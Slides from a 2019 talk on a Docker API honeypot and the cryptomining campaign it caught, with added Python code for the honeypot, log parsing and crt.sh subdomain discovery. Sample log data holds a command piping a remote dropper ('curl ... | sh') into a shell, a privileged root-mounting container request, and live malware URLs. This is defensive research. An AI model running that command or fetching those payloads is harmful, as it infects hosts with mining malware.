Honeypot and Malware Hunting
Florian Charbonneau - HACK2G2
Whoami
Overview
- Honeypot
- Docker API
- HoneyDock
- Stats
- Malware Analysis
- Malware Infrastructure
- Campaign Evolution
Honeypot
Low interaction
Pros:
- Easy to deploy
- Service or system emulation
- Easy to monitor
Cons:
- Attacks are limited
- Easily detectable
- Restricted IOC
High interaction
Pros:
- Detection of advanced events and new exploits
- Highly customizable
- Difficult for an attacker to detect
- Rich IOC
Cons:
- Risky
- Complex implementation
- Needs a supporting architecture
See also: De l'intérêt du Honeypot (On the value of honeypots) - Arnaud Zobec
Docker API
HoneyDock
- Python using Flask
- 40 lines
- Implemented endpoints:
  - _ping
  - version
  - info
  - containers/json
  - containers/create
  - images/create
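Those six endpoints are enough for an automated Docker scanner to believe it has found an open daemon. The following is an added example, not the original HoneyDock source: a Flask-free version using only Python's standard library (http.server) that emulates the same six endpoints, answers with constructed but plausible version/info values, and writes one JSON line per request with the fields worth keeping as IOCs (image name, command, bind mounts, privileged flag). The version strings, the fake host identity, and listening on TCP 2375 (the conventional unencrypted Docker API port) are assumptions, not facts from the talk.

```python
"""Minimal Docker Engine API honeypot in the spirit of HoneyDock.

Added example, not the original HoneyDock code. Standard library only
(http.server instead of Flask). FAKE_VERSION / FAKE_INFO are constructed
values, not captured from a real daemon.
"""
import json
import secrets
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

FAKE_VERSION = {
    "Version": "18.09.0", "ApiVersion": "1.39", "MinAPIVersion": "1.12",
    "GitCommit": "4d60db4", "GoVersion": "go1.10.4", "Os": "linux",
    "Arch": "amd64", "KernelVersion": "4.15.0-39-generic",
}
FAKE_INFO = {
    "ID": "HNYD:OCK0:0000:0000:0000:0000:0000:0000:0000:0000:0000:0000",
    "Containers": 0, "Images": 0, "Name": "docker-host", "NCPU": 2,
    "MemTotal": 4142645248, "ServerVersion": "18.09.0", "OSType": "linux",
    "OperatingSystem": "Ubuntu 18.04.1 LTS", "Architecture": "x86_64",
}


def _strip_api_version(path):
    """Docker clients prefix calls with the API version: /v1.39/containers/json."""
    first, _, rest = path.lstrip("/").partition("/")
    if first.startswith("v") and first[1:].replace(".", "", 1).isdigit():
        return "/" + rest
    return path


def handle_request(method, raw_path, body, src_ip):
    """Emulate one API call. Returns (status, response_text, event)."""
    url = urlparse(raw_path)
    path = _strip_api_version(url.path)
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    event = {"ts": round(time.time(), 3), "src": src_ip,
             "method": method, "path": path, "query": query}

    if method == "GET" and path == "/_ping":
        return 200, "OK", event
    if method == "GET" and path == "/version":
        return 200, json.dumps(FAKE_VERSION), event
    if method == "GET" and path == "/info":
        return 200, json.dumps(FAKE_INFO), event
    if method == "GET" and path == "/containers/json":
        # An empty host looks idle and unclaimed, so the attacker continues.
        return 200, "[]", event
    if method == "POST" and path == "/images/create":
        image = query.get("fromImage", "")
        tag = query.get("tag")
        event["image"] = f"{image}:{tag}" if tag else image
        # The real daemon streams JSON progress objects; one final line suffices.
        done = {"status": f"Status: Downloaded newer image for {event['image']}"}
        return 200, json.dumps(done) + "\n", event
    if method == "POST" and path == "/containers/create":
        try:
            spec = json.loads(body) if body else {}
        except json.JSONDecodeError:
            return 400, json.dumps({"message": "invalid JSON"}), event
        if not isinstance(spec, dict):
            spec = {}
        host_cfg = spec.get("HostConfig") or {}
        # These fields are the IOCs: what was run, and whether it reached for the host.
        event.update({
            "image": spec.get("Image"),
            "cmd": spec.get("Cmd"),
            "entrypoint": spec.get("Entrypoint"),
            "binds": host_cfg.get("Binds"),
            "privileged": bool(host_cfg.get("Privileged", False)),
        })
        # Docker answers 201 Created with a fresh 64-hex container ID.
        return 201, json.dumps({"Id": secrets.token_hex(32), "Warnings": []}), event
    # Anything else (start, exec, ...) gets a daemon-style not-found message.
    return 404, json.dumps({"message": "page not found"}), event


class HoneyDockHandler(BaseHTTPRequestHandler):
    server_version = "Docker/18.09.0 (linux)"   # mimic the daemon's Server header
    sys_version = ""

    def _serve(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length).decode("utf-8", "replace") if length else ""
        status, text, event = handle_request(
            self.command, self.path, body, self.client_address[0])
        print(json.dumps(event), flush=True)     # one JSON line per request
        payload = text.encode()
        self.send_response(status)
        self.send_header("Api-Version", FAKE_VERSION["ApiVersion"])
        self.send_header("Content-Type",
                         "text/plain; charset=utf-8" if text == "OK" else "application/json")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    do_GET = do_POST = do_DELETE = do_PUT = _serve

    def log_message(self, *args):
        pass   # the JSON event line above replaces the default access log


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 2375), HoneyDockHandler).serve_forever()
```

`handle_request` is a pure function, so the emulation can be unit-tested without binding a socket, and the JSON lines on stdout go straight into whatever log pipeline is at hand. Anything beyond the six endpoints, such as `/containers/{id}/start`, returns 404, which is exactly why a low-interaction emulation like this is easily spotted by an attacker who inspects the exchange rather than scripting it.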
- Simple and fast to build
- Easily spotted
- Low interaction

Stats
2018 Nov 8 - 2019 Jan 24 (78 days)

- 14,000 requests from 165 IPs
- ~1 request/min
- Images requested:
  - strm/xmrig
  - bitnn/alpine-xmrig
  - kannix/monero-miner
  - arayan/monero-miner
  - busybox
  - alpine
  - centos
  - ubuntu
- kannix/monero-miner: 10M
- bitnn/alpine-xmrig: 100k
- strm/xmrig: 50k
- arayan/monero-miner: 10k
Malware Analysis
Log Analysis
- IP: 45.77.140.98
- Domain: oceanhole.xyz
- Dropper: https://oceanhole.xyz/d
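The three indicators above come out of the honeypot's request log. As an added example (not the speaker's tooling), the script below walks JSON-lines events of the kind a Docker API honeypot records, counts sources and images the way the Stats section does, pulls download and mining-pool URLs out of the container commands, and flags containers created with a root bind mount or the privileged flag. The sample log is constructed: the source IP, domain and dropper URL are the ones reported in the talk, while the exact command line, the pool address and the other two source addresses are made-up placeholders.

```python
"""Turn honeypot request logs into indicators (the Log Analysis step).

Added example, not the talk's own tooling. Input: one JSON object per
line with the fields a Docker API honeypot can record (src, path, image,
cmd, binds, privileged). SAMPLE_LOG is constructed; only 45.77.140.98,
oceanhole.xyz and https://oceanhole.xyz/d are published indicators.
"""
import json
import re
from collections import Counter
from urllib.parse import urlparse

SAMPLE_LOG = """\
{"ts":1541700000,"src":"45.77.140.98","method":"GET","path":"/version"}
{"ts":1541700001,"src":"45.77.140.98","method":"POST","path":"/images/create","image":"alpine:latest"}
{"ts":1541700002,"src":"45.77.140.98","method":"POST","path":"/containers/create","image":"alpine:latest","cmd":["sh","-c","curl -fsSL https://oceanhole.xyz/d | sh"],"binds":["/:/mnt"],"privileged":true}
{"ts":1541800000,"src":"198.51.100.23","method":"POST","path":"/images/create","image":"kannix/monero-miner:latest"}
{"ts":1541800001,"src":"198.51.100.23","method":"POST","path":"/containers/create","image":"kannix/monero-miner:latest","cmd":["-o","stratum+tcp://203.0.113.9:3333"]}
{"ts":1541900000,"src":"203.0.113.44","method":"GET","path":"/_ping"}
not json: a corrupted line the parser must survive
"""

# http(s) download URLs and stratum pool URLs as they appear inside shell commands.
URL_RE = re.compile(r"(?:https?|stratum\+(?:tcp|ssl))://[^\s'\"`|;&<>()]+")


def parse_events(text):
    """Return one dict per well-formed JSON line; corrupted lines are skipped."""
    events = []
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict):
            events.append(ev)
    return events


def _command_text(ev):
    cmd = ev.get("cmd") or []
    if isinstance(cmd, str):
        return cmd
    return " ".join(str(part) for part in cmd)


def _escape_attempt(ev):
    """Root bind mount or privileged container: the attacker wants the host, not a sandbox."""
    if ev.get("privileged"):
        return True
    return any(b.split(":")[0] == "/" for b in ev.get("binds") or [])


def extract_iocs(events):
    sources = Counter(ev["src"] for ev in events if "src" in ev)
    images = Counter(ev["image"] for ev in events if ev.get("image"))
    urls, hosts, escapes = set(), set(), []
    for ev in events:
        for url in URL_RE.findall(_command_text(ev)):
            urls.add(url)
            host = urlparse(url).hostname   # works for stratum+tcp:// as well as https://
            if host:
                hosts.add(host)
        if ev.get("path") == "/containers/create" and _escape_attempt(ev):
            escapes.append((ev.get("src"), ev.get("image")))
    return {"sources": sources, "images": images, "urls": sorted(urls),
            "hosts": sorted(hosts), "escapes": escapes}


def report(text):
    r = extract_iocs(parse_events(text))
    lines = [f"{sum(r['sources'].values())} requests from {len(r['sources'])} IPs"]
    lines += [f"  {ip}: {n}" for ip, n in r["sources"].most_common()]
    lines.append("images: " + ", ".join(f"{i} ({n})" for i, n in r["images"].most_common()))
    lines.append("download/pool hosts: " + ", ".join(r["hosts"]))
    lines.append("urls: " + ", ".join(r["urls"]))
    lines += [f"host escape attempt from {ip} via {img}" for ip, img in r["escapes"]]
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

The hosts extracted here (the dropper domain and the pool address) are the starting points for the infrastructure mapping later in the talk; the escape flag separates attackers who only want CPU time from those who mount the host filesystem or ask for a privileged container.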
Dropper
https://www.oceanhole.xyz/d
Environment Setup
https://www.oceanhole.xyz/d3
Malware Analysis
https://www.oceanhole.xyz/xg.n.tgz
- .cf
- b
- kernelupd
- xg
https://www.oceanhole.xyz/xg.n.tgz#.cf
xmrigCC
https://www.oceanhole.xyz/xg.n.tgz#b
https://www.oceanhole.xyz/xg.n.tgz#kernelupd
Malware Infrastructure
Infrastructure
- oceanhole.xyz
- vpn.oceanhole.xyz
- host.oceanhole.xyz
oceanhole.xyz
- Domain registered on 2018 Oct 03
- IP: 185.10.68.35
- Reverse DNS: 35.68.10.185.ro.ovo.sc (https://cock.li)
- DNS CNAMEs:
  - wback.oceanhole.xyz
  - ipv4.oceanhole.xyz
  - www.oceanhole.xyz
oceanhole.xyz open ports
- 22: SSH
- 80/443: HTTP(S)
- 3344: HTTPS (xmrigCC dashboard)
oceanhole.xyz:443
- Malware distribution (VirusTotal)
- Config files: Docker, SSH key...
- XMR miner (xmrigCC)
- Web miner (crypto-loot.com)
vpn.oceanhole.xyz
- IP: 45.77.140.98
- The attacking machine
- 22: SSH
host.oceanhole.xyz
- IP: 104.238.190.35
- DNS CNAME: eu.proxy.oceanhole.xyz
- 80: xmr-node-proxy
- 40929: SSH
Campaign Evolution
Other Research
- https://blog.trendmicro.com/trendlabs-security-intelligence/misconfigured-container-abused-to-deliver-cryptocurrency-mining-malware
- https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html
- https://blog.aquasec.com/cryptocurrency-miners-abusing-containers-anatomy-of-an-attempted-attack
Tools
- crt.sh
- Amass
- VirusTotal
- Urlscan.io
- Onyphe.io
- Shodan.io
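The subdomains listed under Infrastructure (vpn, host, www, wback, ipv4, eu.proxy) are what tools such as crt.sh and Amass surface from Certificate Transparency logs and DNS. The following is an added example, not the speaker's code, of the crt.sh part: building the query, and parsing the JSON answer, whose name_value field packs several newline-separated names per certificate, sometimes with wildcards and inconsistent case. The HTTP fetch is injectable so the parser runs offline on a constructed response; that sample reuses the oceanhole.xyz names from the talk, with made-up issuer strings and dates and a decoy name that must be filtered out.

```python
"""Passive subdomain discovery from Certificate Transparency via crt.sh.

Added example, not from the talk. crt.sh answers
https://crt.sh/?q=%25.<domain>&output=json with a list of certificate
records; "name_value" holds newline-separated names. SAMPLE_CRTSH is a
constructed response: the names are those the talk lists for
oceanhole.xyz, the issuers and dates are invented, and "notoceanhole.xyz"
is a decoy that the filter must drop.
"""
import json
import urllib.request
from urllib.parse import quote

_LE = "C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3"
SAMPLE_CRTSH = json.dumps([
    {"issuer_name": _LE, "not_before": "2018-10-04T10:00:00",
     "name_value": "oceanhole.xyz\nwww.oceanhole.xyz"},
    {"issuer_name": _LE, "not_before": "2018-10-20T10:00:00",
     "name_value": "vpn.oceanhole.xyz"},
    {"issuer_name": _LE, "not_before": "2018-11-02T10:00:00",
     "name_value": "*.oceanhole.xyz\nhost.oceanhole.xyz"},
    {"issuer_name": _LE, "not_before": "2018-12-01T10:00:00",
     "name_value": "WWW.oceanhole.xyz"},            # same name, different case
    {"issuer_name": _LE, "not_before": "2018-12-01T10:00:00",
     "name_value": "notoceanhole.xyz"},             # decoy, not under the domain
])


def crtsh_url(domain):
    # %25 is a URL-encoded %, the SQL-style wildcard crt.sh expects.
    return f"https://crt.sh/?q={quote('%.' + domain)}&output=json"


def http_get(url):
    req = urllib.request.Request(url, headers={"User-Agent": "ct-enum/0.1"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8")


def parse_crtsh(raw, domain):
    """Map each name under `domain` to the earliest not_before seen for it, sorted by name."""
    seen = {}
    for rec in json.loads(raw):
        for name in rec.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]          # a wildcard cert still proves the base name exists
            if name != domain and not name.endswith("." + domain):
                continue                 # drop names that merely contain the domain string
            first = rec.get("not_before", "")
            if name not in seen or (first and first < seen[name]):
                seen[name] = first
    return dict(sorted(seen.items()))


def enumerate_subdomains(domain, fetch=http_get):
    return parse_crtsh(fetch(crtsh_url(domain)), domain)


if __name__ == "__main__":
    # Offline run on the constructed sample; pass fetch=http_get for a live query.
    for name, first in enumerate_subdomains("oceanhole.xyz", fetch=lambda _: SAMPLE_CRTSH).items():
        print(first, name)
```

The earliest certificate date per name is worth keeping: it brackets when a host was stood up, which is how a campaign timeline such as the one under Campaign Evolution gets anchored. Names found this way still need resolving (and a port scan, as in the host listings above) before they are confirmed infrastructure.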
Thanks
Questions?

HACK2G2 | Honeypot and Malware Hunting
By Florian Charbonneau
Presented 30/01/2019